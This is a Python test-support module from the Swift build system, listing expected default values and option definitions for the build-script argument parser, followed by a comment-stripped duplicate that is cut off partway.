# This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See https://swift.org/LICENSE.txt for license information # See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors from __future__ import absolute_import, unicode_literals import multiprocessing from build_swift import argparse from build_swift import defaults from swift_build_support.swift_build_support import targets __all__ = [ 'HelpOption', 'SetOption', 'SetTrueOption', 'SetFalseOption', 'DisableOption', 'EnableOption', 'ChoicesOption', 'IntOption', 'StrOption', 'PathOption', 'AppendOption', 'UnsupportedOption', 'IgnoreOption', 'EXPECTED_OPTIONS', 'EXPECTED_DEFAULTS', ] # ----------------------------------------------------------------------------- EXPECTED_DEFAULTS = { 'android': False, 'android_api_level': '21', 'android_deploy_device_path': '/data/local/tmp', 'android_icu_i18n': None, 'android_icu_i18n_include': None, 'android_icu_uc': None, 'android_icu_uc_include': None, 'android_icu_data': None, 'android_ndk': None, 'android_ndk_gcc_version': '4.9', 'android_arch': 'armv7', 'assertions': True, 'benchmark': False, 'benchmark_num_o_iterations': 3, 'benchmark_num_onone_iterations': 3, 'build_android': False, 'build_args': [], 'build_benchmarks': True, 'build_clang_tools_extra': True, 'build_cygwin': True, 'build_external_benchmarks': False, 'build_foundation': False, 'build_cmark': True, 'build_swift': True, 'build_llvm': True, 'build_freebsd': True, 'build_ios': True, 'build_ios_device': False, 'build_ios_simulator': False, 'build_jobs': multiprocessing.cpu_count(), 'build_libdispatch': False, 'build_libicu': False, 'build_linux': True, 'build_llbuild': False, 'build_lldb': False, 'build_libcxx': False, 'build_ninja': False, 'build_osx': True, 'build_playgroundsupport': False, 'build_runtime_with_host_compiler': False, 'build_stdlib_deployment_targets': ['all'], 'build_subdir': None, 'build_swift_dynamic_sdk_overlay': True, 'build_swift_dynamic_stdlib': True, 'build_swift_inspect': False, 'build_swift_static_sdk_overlay': False, 'build_swift_static_stdlib': False, 'build_swift_stdlib_unittest_extra': False, 'build_swiftpm': False, 'build_swift_driver': False, 'build_early_swift_driver': True, 'build_swiftsyntax': False, 'build_libparser_only': False, 'build_skstresstester': False, 'build_swiftformat': False, 'build_swiftevolve': False, 'build_indexstoredb': False, 'test_indexstoredb_sanitize_all': False, 'test_sourcekitlsp_sanitize_all': False, 'build_sourcekitlsp': False, 'install_swiftpm': False, 'install_swiftsyntax': False, 'install_swift_driver': False, 'swiftsyntax_verify_generated_files': False, 'install_playgroundsupport': False, 'install_sourcekitlsp': False, 'install_skstresstester': False, 'install_swiftevolve': False, 'build_toolchainbenchmarks': False, 'build_tvos': True, 'build_tvos_device': False, 'build_tvos_simulator': False, 'build_variant': 'Debug', 'build_watchos': True, 'build_watchos_device': False, 'build_watchos_simulator': False, 'build_xctest': False, 'cmake_c_launcher': None, 'cmake_cxx_launcher': None, 'clang_compiler_version': None, 'clang_profile_instr_use': None, 'clang_user_visible_version': defaults.CLANG_USER_VISIBLE_VERSION, 'clean': False, 'cmake': None, 'cmake_generator': 'Ninja', 'cmark_assertions': True, 'cmark_build_variant': 'Debug', 'compiler_vendor': defaults.COMPILER_VENDOR, 'coverage_db': None, 'cross_compile_hosts': [], 'darwin_deployment_version_ios': defaults.DARWIN_DEPLOYMENT_VERSION_IOS, 'darwin_deployment_version_osx': defaults.DARWIN_DEPLOYMENT_VERSION_OSX, 'darwin_deployment_version_tvos': defaults.DARWIN_DEPLOYMENT_VERSION_TVOS, 'darwin_deployment_version_watchos': defaults.DARWIN_DEPLOYMENT_VERSION_WATCHOS, 'darwin_symroot_path_filters': [], 'darwin_xcrun_toolchain': None, 'distcc': False, 'sccache': False, 'dry_run': False, 'dsymutil_jobs': defaults.DSYMUTIL_JOBS, 'enable_asan': False, 'enable_experimental_differentiable_programming': True, 'enable_experimental_concurrency': True, 'enable_lsan': False, 'enable_sanitize_coverage': False, 'disable_guaranteed_normal_arguments': False, 'enable_stdlibcore_exclusivity_checking': False, 'enable_tsan': False, 'enable_tsan_runtime': False, 'enable_ubsan': False, 'export_compile_commands': False, 'extra_cmake_options': [], 'extra_swift_args': [], 'force_optimized_typechecker': False, 'foundation_build_variant': 'Debug', 'host_cc': None, 'host_cxx': None, 'host_libtool': None, 'host_lipo': None, 'host_target': targets.StdlibDeploymentTarget.host_target().name, 'host_test': False, 'only_executable_test': False, 'only_non_executable_test': False, 'infer_dependencies': False, 'install_prefix': targets.install_prefix(), 'install_symroot': None, 'install_destdir': None, 'install_all': False, 'ios': False, 'ios_all': False, 'legacy_impl': False, 'libdispatch_build_variant': 'Debug', 'libicu_build_variant': 'Debug', 'lit_args': '-sv', 'llbuild_assertions': True, 'lldb_assertions': True, 'lldb_build_variant': 'Debug', 'lldb_build_with_xcode': '0', 'llvm_assertions': True, 'llvm_build_variant': 'Debug', 'llvm_ninja_targets': [], 'llvm_ninja_targets_for_cross_compile_hosts': [], 'llvm_max_parallel_lto_link_jobs': defaults.LLVM_MAX_PARALLEL_LTO_LINK_JOBS, 'llvm_targets_to_build': 'X86;ARM;AArch64;PowerPC;SystemZ;Mips', 'tsan_libdispatch_test': False, 'long_test': False, 'lto_type': None, 'maccatalyst': False, 'maccatalyst_ios_tests': False, 'native_clang_tools_path': None, 'native_llvm_tools_path': None, 'native_swift_tools_path': None, 'dump_config': False, 'relocate_xdg_cache_home_under_build_subdir': False, 'show_sdks': False, 'skip_build': False, 'skip_local_build': False, 'stdlib_deployment_targets': None, 'stress_test': False, 'swift_analyze_code_coverage': defaults.SWIFT_ANALYZE_CODE_COVERAGE, 'swift_assertions': True, 'swift_build_variant': 'Debug', 'swift_compiler_version': None, 'swift_disable_dead_stripping': False, 'swift_darwin_module_archs': None, 'swift_darwin_supported_archs': None, 'swift_stdlib_assertions': True, 'swift_stdlib_build_variant': 'Debug', 'swift_tools_max_parallel_lto_link_jobs': defaults.SWIFT_MAX_PARALLEL_LTO_LINK_JOBS, 'swift_user_visible_version': defaults.SWIFT_USER_VISIBLE_VERSION, 'symbols_package': None, 'clean_llbuild': True, 'clean_swiftpm': True, 'clean_swift_driver': True, 'clean_early_swift_driver': False, 'test': None, 'test_early_swift_driver': None, 'test_android': False, 'test_android_host': False, 'test_cygwin': False, 'test_freebsd': False, 'test_ios': False, 'test_ios_32bit_simulator': False, 'test_watchos_32bit_simulator': True, 'test_ios_host': False, 'test_ios_simulator': False, 'test_linux': False, 'test_optimize_for_size': None, 'test_optimize_none_with_implicit_dynamic': None, 'test_optimized': None, 'test_osx': False, 'test_paths': [], 'test_swift_inspect': True, 'test_tvos': False, 'test_tvos_host': False, 'test_tvos_simulator': False, 'test_watchos': False, 'test_watchos_host': False, 'test_watchos_simulator': False, 'test_playgroundsupport': True, 'test_swiftpm': False, 'test_swift_driver': False, 'test_swiftsyntax': False, 'test_indexstoredb': False, 'test_sourcekitlsp': False, 'test_skstresstester': False, 'test_swiftformat': False, 'test_swiftevolve': False, 'test_toolchainbenchmarks': False, 'tvos': False, 'tvos_all': False, 'validation_test': None, 'verbose_build': False, 'watchos': False, 'watchos_all': False, 'llvm_install_components': defaults.llvm_install_components(), } # ----------------------------------------------------------------------------- def _sanitize_option_string(option_string): if option_string.startswith('--'): return option_string[2:].replace('-', '_') if len(option_string) == 2 and option_string[0] == '-': return option_string[1] raise ValueError('invalid option_string format: ' + option_string) class _BaseOption(object): def __init__(self, option_string, dest=None, default=None): if dest is None: dest = _sanitize_option_string(option_string) if default is None: default = EXPECTED_DEFAULTS.get(dest, None) self.option_string = option_string self.dest = dest self.default = default def sanitized_string(self): return _sanitize_option_string(self.option_string) class HelpOption(_BaseOption): """Option that prints the help message and exits.""" pass class SetOption(_BaseOption): """Option that accepts no arguments, setting the destination to a hard-coded value or None. """ def __init__(self, *args, **kwargs): self.value = kwargs.pop('value', None) super(SetOption, self).__init__(*args, **kwargs) class SetTrueOption(_BaseOption): """Option that accepts no arguments, setting the destination value to True if parsed and defaulting to False otherwise. """ pass class SetFalseOption(_BaseOption): """Option that accepts no arguments, setting the destination value to False if parsed and defaulting to True otherwise. """ pass class EnableOption(_BaseOption): """Option that sets the destination to True when parsed and False by default. Can be toggled True or False with an optional bool argument. """ pass class DisableOption(_BaseOption): """Option that sets the destination to False when parsed and True by default. Can be toggled True or False with an optional bool argument, which is then negated. Thus if an option is passed the value 'True' it will set the destination to False and vice versa. """ pass class ChoicesOption(_BaseOption): """Option that accepts an argument from a predifined list of choices.""" def __init__(self, *args, **kwargs): self.choices = kwargs.pop('choices', None) super(ChoicesOption, self).__init__(*args, **kwargs) class IntOption(_BaseOption): """Option that accepts an int argument.""" pass class StrOption(_BaseOption): """Option that accepts a str argument.""" pass class PathOption(_BaseOption): """Option that accepts a path argument.""" pass class AppendOption(_BaseOption): """Option that can be called more than once to append argument to internal list. """ pass class UnsupportedOption(_BaseOption): """Option that is not supported.""" pass class IgnoreOption(_BaseOption): """Option that should be ignored when generating tests. Instead a test should be written manually as the behavior cannot or should not be auto- generated. """ pass class BuildScriptImplOption(_BaseOption): """Option that gets forwarded to build-script-impl by migration.py and is only listed for disambiguation by argparse. """ pass # ----------------------------------------------------------------------------- EXPECTED_OPTIONS = [ # Ignore the help options since they always call sys.exit(0) HelpOption('-h', dest='help', default=argparse.SUPPRESS), HelpOption('--help', dest='help', default=argparse.SUPPRESS), SetOption('--debug', dest='build_variant', value='Debug'), SetOption('--debug-cmark', dest='cmark_build_variant', value='Debug'), SetOption('--debug-foundation', dest='foundation_build_variant', value='Debug'), SetOption('--debug-libdispatch', dest='libdispatch_build_variant', value='Debug'), SetOption('--debug-libicu', dest='libicu_build_variant', value='Debug'), SetOption('--debug-lldb', dest='lldb_build_variant', value='Debug'), SetOption('--lldb-build-with-xcode', dest='lldb_build_with_xcode', value='1'), SetOption('--lldb-build-with-cmake', dest='lldb_build_with_xcode', value='0'), SetOption('--debug-llvm', dest='llvm_build_variant', value='Debug'), SetOption('--debug-swift', dest='swift_build_variant', value='Debug'), SetOption('--debug-swift-stdlib', dest='swift_stdlib_build_variant', value='Debug'), SetOption('--eclipse', dest='cmake_generator', value='Eclipse CDT4 - Ninja'), SetOption('--make', dest='cmake_generator', value='Unix Makefiles'), SetOption('--release', dest='build_variant', value='Release'), SetOption('--release-debuginfo', dest='build_variant', value='RelWithDebInfo'), SetOption('--min-size-release', dest='build_variant', value='MinSizeRel'), SetOption('--xcode', dest='cmake_generator', value='Xcode'), SetOption('-R', dest='build_variant', value='Release'), SetOption('-d', dest='build_variant', value='Debug'), SetOption('-e', dest='cmake_generator', value='Eclipse CDT4 - Ninja'), SetOption('-m', dest='cmake_generator', value='Unix Makefiles'), SetOption('-r', dest='build_variant', value='RelWithDebInfo'), SetOption('-x', dest='cmake_generator', value='Xcode'), # FIXME: Convert these options to set_true actions SetOption('--assertions', value=True), SetOption('--cmark-assertions', value=True), SetOption('--lldb-assertions', value=True), SetOption('--llvm-assertions', value=True), SetOption('--llbuild-assertions', value=True), SetOption('--swift-assertions', value=True), SetOption('--swift-stdlib-assertions', value=True), SetOption('-T', dest='validation_test', value=True), SetOption('-o', dest='test_optimized', value=True), SetOption('-s', dest='test_optimize_for_size', value=True), SetOption('-y', dest='test_optimize_none_with_implicit_dynamic', value=True), SetOption('-t', dest='test', value=True), SetOption('-a', dest='assertions', value=True), # FIXME: Convert these options to set_false actions SetOption('--no-assertions', dest='assertions', value=False), SetOption('-A', dest='assertions', value=False), SetOption('--no-lldb-assertions', dest='lldb_assertions', value=False), SetOption('--no-llvm-assertions', dest='llvm_assertions', value=False), SetOption('--no-llbuild-assertions', dest='llbuild_assertions', value=False), SetOption('--no-swift-assertions', dest='swift_assertions', value=False), SetOption('--no-swift-stdlib-assertions', dest='swift_stdlib_assertions', value=False), SetOption('--skip-ios', dest='ios', value=False), SetOption('--skip-tvos', dest='tvos', value=False), SetOption('--skip-watchos', dest='watchos', value=False), SetOption('--skip-test-early-swift-driver', dest='test_early_swift_driver', value=False), SetTrueOption('--benchmark'), SetTrueOption('--clean'), SetTrueOption('--dry-run'), SetTrueOption('--dump-config'), SetTrueOption('--disable-guaranteed-normal-arguments'), SetTrueOption('--enable-stdlibcore-exclusivity-checking'), SetTrueOption('--force-optimized-typechecker'), SetTrueOption('--ios'), SetTrueOption('--llbuild', dest='build_llbuild'), SetTrueOption('--lldb', dest='build_lldb'), SetTrueOption('--libcxx', dest='build_libcxx'), SetTrueOption('--maccatalyst', dest='maccatalyst'), SetTrueOption('--maccatalyst-ios-tests', dest='maccatalyst_ios_tests'), SetTrueOption('--playgroundsupport', dest='build_playgroundsupport'), SetTrueOption('--install-playgroundsupport', dest='install_playgroundsupport'), SetTrueOption('--skip-build'), SetTrueOption('--swiftpm', dest='build_swiftpm'), SetTrueOption('--swift-driver', dest='build_swift_driver'), SetTrueOption('--swiftsyntax', dest='build_swiftsyntax'), SetTrueOption('--build-libparser-only', dest='build_libparser_only'), SetTrueOption('--skstresstester', dest='build_skstresstester'), SetTrueOption('--swiftformat', dest='build_swiftformat'), SetTrueOption('--swiftevolve', dest='build_swiftevolve'), SetTrueOption('-B', dest='benchmark'), SetTrueOption('-S', dest='skip_build'), SetTrueOption('-b', dest='build_llbuild'), SetTrueOption('-c', dest='clean'), SetTrueOption('-i', dest='ios'), SetTrueOption('-l', dest='build_lldb'), SetTrueOption('-n', dest='dry_run'), SetTrueOption('-p', dest='build_swiftpm'), SetTrueOption('--legacy-impl', dest='legacy_impl'), SetTrueOption('--infer', dest='infer_dependencies'), EnableOption('--android'), EnableOption('--build-external-benchmarks'), EnableOption('--build-ninja'), EnableOption('--build-runtime-with-host-compiler'), EnableOption('--build-swift-dynamic-sdk-overlay'), EnableOption('--build-swift-dynamic-stdlib'), EnableOption('--build-swift-static-sdk-overlay'), EnableOption('--build-swift-static-stdlib'), EnableOption('--build-swift-stdlib-unittest-extra'), EnableOption('--distcc'), EnableOption('--sccache'), EnableOption('--enable-asan'), EnableOption('--enable-experimental-differentiable-programming'), EnableOption('--enable-experimental-concurrency'), EnableOption('--enable-lsan'), EnableOption('--enable-sanitize-coverage'), EnableOption('--enable-tsan'), EnableOption('--enable-tsan-runtime'), EnableOption('--enable-ubsan'), EnableOption('--export-compile-commands'), EnableOption('--foundation', dest='build_foundation'), EnableOption('--host-test'), EnableOption('--only-executable-test'), EnableOption('--only-non-executable-test'), EnableOption('--libdispatch', dest='build_libdispatch'), EnableOption('--libicu', dest='build_libicu'), EnableOption('--indexstore-db', dest='build_indexstoredb'), EnableOption('--test-indexstore-db-sanitize-all', dest='test_indexstoredb_sanitize_all'), EnableOption('--sourcekit-lsp', dest='build_sourcekitlsp'), EnableOption('--test-sourcekit-lsp-sanitize-all', dest='test_sourcekitlsp_sanitize_all'), EnableOption('--install-swiftsyntax', dest='install_swiftsyntax'), EnableOption('--swiftsyntax-verify-generated-files', dest='swiftsyntax_verify_generated_files'), EnableOption('--install-swiftpm', dest='install_swiftpm'), EnableOption('--install-swift-driver', dest='install_swift_driver'), EnableOption('--install-sourcekit-lsp', dest='install_sourcekitlsp'), EnableOption('--install-skstresstester', dest='install_skstresstester'), EnableOption('--install-swiftevolve', dest='install_swiftevolve'), EnableOption('--toolchain-benchmarks', dest='build_toolchainbenchmarks'), EnableOption('--swift-inspect', dest='build_swift_inspect'), EnableOption('--tsan-libdispatch-test'), EnableOption('--long-test'), EnableOption('--show-sdks'), EnableOption('--skip-local-build'), EnableOption('--stress-test'), EnableOption('--test'), EnableOption('--test-optimize-for-size'), EnableOption('--test-optimize-none-with-implicit-dynamic'), EnableOption('--test-optimized'), EnableOption('--tvos'), EnableOption('--validation-test'), EnableOption('--verbose-build'), EnableOption('--watchos'), EnableOption('--xctest', dest='build_xctest'), EnableOption('--swift-disable-dead-stripping'), EnableOption('--clean-early-swift-driver', dest='clean_early_swift_driver'), DisableOption('--skip-build-cmark', dest='build_cmark'), DisableOption('--skip-build-llvm', dest='build_llvm'), DisableOption('--skip-build-swift', dest='build_swift'), DisableOption('--skip-build-android', dest='build_android'), DisableOption('--skip-build-benchmarks', dest='build_benchmarks'), DisableOption('--skip-build-cygwin', dest='build_cygwin'), DisableOption('--skip-build-freebsd', dest='build_freebsd'), DisableOption('--skip-build-ios', dest='build_ios'), DisableOption('--skip-build-ios-device', dest='build_ios_device'), DisableOption('--skip-build-ios-simulator', dest='build_ios_simulator'), DisableOption('--skip-build-linux', dest='build_linux'), DisableOption('--skip-build-osx', dest='build_osx'), DisableOption('--skip-build-tvos', dest='build_tvos'), DisableOption('--skip-build-tvos-device', dest='build_tvos_device'), DisableOption('--skip-build-tvos-simulator', dest='build_tvos_simulator'), DisableOption('--skip-build-watchos', dest='build_watchos'), DisableOption('--skip-build-watchos-device', dest='build_watchos_device'), DisableOption('--skip-build-watchos-simulator', dest='build_watchos_simulator'), DisableOption('--skip-clean-llbuild', dest='clean_llbuild'), DisableOption('--skip-early-swift-driver', dest='build_early_swift_driver'), DisableOption('--skip-clean-swiftpm', dest='clean_swiftpm'), DisableOption('--skip-clean-swift-driver', dest='clean_swift_driver'), DisableOption('--skip-test-android', dest='test_android'), DisableOption('--skip-test-android-host', dest='test_android_host'), DisableOption('--skip-test-cygwin', dest='test_cygwin'), DisableOption('--skip-test-freebsd', dest='test_freebsd'), DisableOption('--skip-test-ios', dest='test_ios'), DisableOption('--skip-test-ios-32bit-simulator', dest='test_ios_32bit_simulator'), DisableOption('--skip-test-watchos-32bit-simulator', dest='test_watchos_32bit_simulator'), DisableOption('--skip-test-ios-host', dest='test_ios_host'), DisableOption('--skip-test-ios-simulator', dest='test_ios_simulator'), DisableOption('--skip-test-linux', dest='test_linux'), DisableOption('--skip-test-osx', dest='test_osx'), DisableOption('--skip-test-tvos', dest='test_tvos'), DisableOption('--skip-test-tvos-host', dest='test_tvos_host'), DisableOption('--skip-test-tvos-simulator', dest='test_tvos_simulator'), DisableOption('--skip-test-watchos', dest='test_watchos'), DisableOption('--skip-test-watchos-host', dest='test_watchos_host'), DisableOption('--skip-test-watchos-simulator', dest='test_watchos_simulator'), DisableOption('--skip-test-playgroundsupport', dest='test_playgroundsupport'), DisableOption('--skip-test-swiftpm', dest='test_swiftpm'), DisableOption('--skip-test-swift-driver', dest='test_swift_driver'), DisableOption('--skip-test-swiftsyntax', dest='test_swiftsyntax'), DisableOption('--skip-test-indexstore-db', dest='test_indexstoredb'), DisableOption('--skip-test-sourcekit-lsp', dest='test_sourcekitlsp'), DisableOption('--skip-test-skstresstester', dest='test_skstresstester'), DisableOption('--skip-test-swiftformat', dest='test_swiftformat'), DisableOption('--skip-test-swiftevolve', dest='test_swiftevolve'), DisableOption('--skip-test-toolchain-benchmarks', dest='test_toolchainbenchmarks'), DisableOption('--skip-test-swift-inspect', dest='test_swift_inspect'), DisableOption('--skip-build-clang-tools-extra', dest='build_clang_tools_extra'), ChoicesOption('--android-ndk-gcc-version', choices=['4.8', '4.9']), ChoicesOption('--compiler-vendor', choices=['none', 'apple']), ChoicesOption('--swift-analyze-code-coverage', choices=['false', 'not-merged', 'merged']), ChoicesOption('--android-arch', choices=['armv7', 'aarch64']), StrOption('--android-api-level'), StrOption('--build-args'), StrOption('--build-stdlib-deployment-targets'), StrOption('--darwin-deployment-version-ios'), StrOption('--darwin-deployment-version-osx'), StrOption('--darwin-deployment-version-tvos'), StrOption('--darwin-deployment-version-watchos'), StrOption('--darwin-xcrun-toolchain'), StrOption('--host-target'), StrOption('--lit-args'), StrOption('--llvm-targets-to-build'), StrOption('--stdlib-deployment-targets'), StrOption('--swift-darwin-module-archs'), StrOption('--swift-darwin-supported-archs'), PathOption('--android-deploy-device-path'), PathOption('--android-icu-i18n'), PathOption('--android-icu-i18n-include'), PathOption('--android-icu-uc'), PathOption('--android-icu-uc-include'), PathOption('--android-icu-data'), PathOption('--android-ndk'), PathOption('--build-subdir'), SetTrueOption('--relocate-xdg-cache-home-under-build-subdir'), PathOption('--clang-profile-instr-use'), PathOption('--cmake'), PathOption('--coverage-db'), PathOption('--host-cc'), PathOption('--host-cxx'), PathOption('--host-libtool'), PathOption('--host-lipo'), PathOption('--install-prefix'), PathOption('--install-symroot'), PathOption('--install-destdir'), EnableOption('--install-all'), PathOption('--native-clang-tools-path'), PathOption('--native-llvm-tools-path'), PathOption('--native-swift-tools-path'), PathOption('--symbols-package'), PathOption('--cmake-c-launcher'), PathOption('--cmake-cxx-launcher'), IntOption('--benchmark-num-o-iterations'), IntOption('--benchmark-num-onone-iterations'), IntOption('--jobs', dest='build_jobs'), IntOption('--llvm-max-parallel-lto-link-jobs'), IntOption('--swift-tools-max-parallel-lto-link-jobs'), IntOption('-j', dest='build_jobs'), IntOption('--dsymutil-jobs', dest='dsymutil_jobs'), AppendOption('--cross-compile-hosts'), AppendOption('--extra-cmake-options'), AppendOption('--extra-swift-args'), AppendOption('--test-paths'), AppendOption('--llvm-ninja-targets'), AppendOption('--llvm-ninja-targets-for-cross-compile-hosts'), AppendOption('--darwin-symroot-path-filters'), UnsupportedOption('--build-jobs'), UnsupportedOption('--common-cmake-options'), UnsupportedOption('--only-execute'), UnsupportedOption('--skip-test-optimize-for-size'), UnsupportedOption('--skip-test-optimize-none-with-implicit-dynamic'), UnsupportedOption('--skip-test-optimized'), # Options forwared to build-script-impl BuildScriptImplOption('--skip-test-swift', dest='impl_skip_test_swift'), BuildScriptImplOption('--install-swift', dest='impl_install_swift'), # NOTE: LTO flag is a special case that acts both as an option and has # valid choices SetOption('--lto', dest='lto_type'), ChoicesOption('--lto', dest='lto_type', choices=['thin', 'full']), # NOTE: We'll need to manually test the behavior of these since they # validate compiler version strings. IgnoreOption('--clang-compiler-version'), IgnoreOption('--clang-user-visible-version'), IgnoreOption('--swift-compiler-version'), IgnoreOption('--swift-user-visible-version'), # TODO: Migrate to unavailable options once new parser is in place IgnoreOption('-I'), IgnoreOption('--ios-all'), IgnoreOption('--tvos-all'), IgnoreOption('--watchos-all'), StrOption('--llvm-install-components'), ]
38.266393
81
0.676627
from __future__ import absolute_import, unicode_literals import multiprocessing from build_swift import argparse from build_swift import defaults from swift_build_support.swift_build_support import targets __all__ = [ 'HelpOption', 'SetOption', 'SetTrueOption', 'SetFalseOption', 'DisableOption', 'EnableOption', 'ChoicesOption', 'IntOption', 'StrOption', 'PathOption', 'AppendOption', 'UnsupportedOption', 'IgnoreOption', 'EXPECTED_OPTIONS', 'EXPECTED_DEFAULTS', ] EXPECTED_DEFAULTS = { 'android': False, 'android_api_level': '21', 'android_deploy_device_path': '/data/local/tmp', 'android_icu_i18n': None, 'android_icu_i18n_include': None, 'android_icu_uc': None, 'android_icu_uc_include': None, 'android_icu_data': None, 'android_ndk': None, 'android_ndk_gcc_version': '4.9', 'android_arch': 'armv7', 'assertions': True, 'benchmark': False, 'benchmark_num_o_iterations': 3, 'benchmark_num_onone_iterations': 3, 'build_android': False, 'build_args': [], 'build_benchmarks': True, 'build_clang_tools_extra': True, 'build_cygwin': True, 'build_external_benchmarks': False, 'build_foundation': False, 'build_cmark': True, 'build_swift': True, 'build_llvm': True, 'build_freebsd': True, 'build_ios': True, 'build_ios_device': False, 'build_ios_simulator': False, 'build_jobs': multiprocessing.cpu_count(), 'build_libdispatch': False, 'build_libicu': False, 'build_linux': True, 'build_llbuild': False, 'build_lldb': False, 'build_libcxx': False, 'build_ninja': False, 'build_osx': True, 'build_playgroundsupport': False, 'build_runtime_with_host_compiler': False, 'build_stdlib_deployment_targets': ['all'], 'build_subdir': None, 'build_swift_dynamic_sdk_overlay': True, 'build_swift_dynamic_stdlib': True, 'build_swift_inspect': False, 'build_swift_static_sdk_overlay': False, 'build_swift_static_stdlib': False, 'build_swift_stdlib_unittest_extra': False, 'build_swiftpm': False, 'build_swift_driver': False, 'build_early_swift_driver': True, 'build_swiftsyntax': False, 'build_libparser_only': False, 'build_skstresstester': False, 'build_swiftformat': False, 'build_swiftevolve': False, 'build_indexstoredb': False, 'test_indexstoredb_sanitize_all': False, 'test_sourcekitlsp_sanitize_all': False, 'build_sourcekitlsp': False, 'install_swiftpm': False, 'install_swiftsyntax': False, 'install_swift_driver': False, 'swiftsyntax_verify_generated_files': False, 'install_playgroundsupport': False, 'install_sourcekitlsp': False, 'install_skstresstester': False, 'install_swiftevolve': False, 'build_toolchainbenchmarks': False, 'build_tvos': True, 'build_tvos_device': False, 'build_tvos_simulator': False, 'build_variant': 'Debug', 'build_watchos': True, 'build_watchos_device': False, 'build_watchos_simulator': False, 'build_xctest': False, 'cmake_c_launcher': None, 'cmake_cxx_launcher': None, 'clang_compiler_version': None, 'clang_profile_instr_use': None, 'clang_user_visible_version': defaults.CLANG_USER_VISIBLE_VERSION, 'clean': False, 'cmake': None, 'cmake_generator': 'Ninja', 'cmark_assertions': True, 'cmark_build_variant': 'Debug', 'compiler_vendor': defaults.COMPILER_VENDOR, 'coverage_db': None, 'cross_compile_hosts': [], 'darwin_deployment_version_ios': defaults.DARWIN_DEPLOYMENT_VERSION_IOS, 'darwin_deployment_version_osx': defaults.DARWIN_DEPLOYMENT_VERSION_OSX, 'darwin_deployment_version_tvos': defaults.DARWIN_DEPLOYMENT_VERSION_TVOS, 'darwin_deployment_version_watchos': defaults.DARWIN_DEPLOYMENT_VERSION_WATCHOS, 'darwin_symroot_path_filters': [], 'darwin_xcrun_toolchain': None, 'distcc': False, 'sccache': False, 'dry_run': False, 'dsymutil_jobs': defaults.DSYMUTIL_JOBS, 'enable_asan': False, 'enable_experimental_differentiable_programming': True, 'enable_experimental_concurrency': True, 'enable_lsan': False, 'enable_sanitize_coverage': False, 'disable_guaranteed_normal_arguments': False, 'enable_stdlibcore_exclusivity_checking': False, 'enable_tsan': False, 'enable_tsan_runtime': False, 'enable_ubsan': False, 'export_compile_commands': False, 'extra_cmake_options': [], 'extra_swift_args': [], 'force_optimized_typechecker': False, 'foundation_build_variant': 'Debug', 'host_cc': None, 'host_cxx': None, 'host_libtool': None, 'host_lipo': None, 'host_target': targets.StdlibDeploymentTarget.host_target().name, 'host_test': False, 'only_executable_test': False, 'only_non_executable_test': False, 'infer_dependencies': False, 'install_prefix': targets.install_prefix(), 'install_symroot': None, 'install_destdir': None, 'install_all': False, 'ios': False, 'ios_all': False, 'legacy_impl': False, 'libdispatch_build_variant': 'Debug', 'libicu_build_variant': 'Debug', 'lit_args': '-sv', 'llbuild_assertions': True, 'lldb_assertions': True, 'lldb_build_variant': 'Debug', 'lldb_build_with_xcode': '0', 'llvm_assertions': True, 'llvm_build_variant': 'Debug', 'llvm_ninja_targets': [], 'llvm_ninja_targets_for_cross_compile_hosts': [], 'llvm_max_parallel_lto_link_jobs': defaults.LLVM_MAX_PARALLEL_LTO_LINK_JOBS, 'llvm_targets_to_build': 'X86;ARM;AArch64;PowerPC;SystemZ;Mips', 'tsan_libdispatch_test': False, 'long_test': False, 'lto_type': None, 'maccatalyst': False, 'maccatalyst_ios_tests': False, 'native_clang_tools_path': None, 'native_llvm_tools_path': None, 'native_swift_tools_path': None, 'dump_config': False, 'relocate_xdg_cache_home_under_build_subdir': False, 'show_sdks': False, 'skip_build': False, 'skip_local_build': False, 'stdlib_deployment_targets': None, 'stress_test': False, 'swift_analyze_code_coverage': defaults.SWIFT_ANALYZE_CODE_COVERAGE, 'swift_assertions': True, 'swift_build_variant': 'Debug', 'swift_compiler_version': None, 'swift_disable_dead_stripping': False, 'swift_darwin_module_archs': None, 'swift_darwin_supported_archs': None, 'swift_stdlib_assertions': True, 'swift_stdlib_build_variant': 'Debug', 'swift_tools_max_parallel_lto_link_jobs': defaults.SWIFT_MAX_PARALLEL_LTO_LINK_JOBS, 'swift_user_visible_version': defaults.SWIFT_USER_VISIBLE_VERSION, 'symbols_package': None, 'clean_llbuild': True, 'clean_swiftpm': True, 'clean_swift_driver': True, 'clean_early_swift_driver': False, 'test': None, 'test_early_swift_driver': None, 'test_android': False, 'test_android_host': False, 'test_cygwin': False, 'test_freebsd': False, 'test_ios': False, 'test_ios_32bit_simulator': False, 'test_watchos_32bit_simulator': True, 'test_ios_host': False, 'test_ios_simulator': False, 'test_linux': False, 'test_optimize_for_size': None, 'test_optimize_none_with_implicit_dynamic': None, 'test_optimized': None, 'test_osx': False, 'test_paths': [], 'test_swift_inspect': True, 'test_tvos': False, 'test_tvos_host': False, 'test_tvos_simulator': False, 'test_watchos': False, 'test_watchos_host': False, 'test_watchos_simulator': False, 'test_playgroundsupport': True, 'test_swiftpm': False, 'test_swift_driver': False, 'test_swiftsyntax': False, 'test_indexstoredb': False, 'test_sourcekitlsp': False, 'test_skstresstester': False, 'test_swiftformat': False, 'test_swiftevolve': False, 'test_toolchainbenchmarks': False, 'tvos': False, 'tvos_all': False, 'validation_test': None, 'verbose_build': False, 'watchos': False, 'watchos_all': False, 'llvm_install_components': defaults.llvm_install_components(), } def _sanitize_option_string(option_string): if option_string.startswith('--'): return option_string[2:].replace('-', '_') if len(option_string) == 2 and option_string[0] == '-': return option_string[1] raise ValueError('invalid option_string format: ' + option_string) class _BaseOption(object): def __init__(self, option_string, dest=None, default=None): if dest is None: dest = _sanitize_option_string(option_string) if default is None: default = EXPECTED_DEFAULTS.get(dest, None) self.option_string = option_string self.dest = dest self.default = default def sanitized_string(self): return _sanitize_option_string(self.option_string) class HelpOption(_BaseOption): pass class SetOption(_BaseOption): def __init__(self, *args, **kwargs): self.value = kwargs.pop('value', None) super(SetOption, self).__init__(*args, **kwargs) class SetTrueOption(_BaseOption): pass class SetFalseOption(_BaseOption): pass class EnableOption(_BaseOption): pass class DisableOption(_BaseOption): pass class ChoicesOption(_BaseOption): def __init__(self, *args, **kwargs): self.choices = kwargs.pop('choices', None) super(ChoicesOption, self).__init__(*args, **kwargs) class IntOption(_BaseOption): pass class StrOption(_BaseOption): pass class PathOption(_BaseOption): pass class AppendOption(_BaseOption): pass 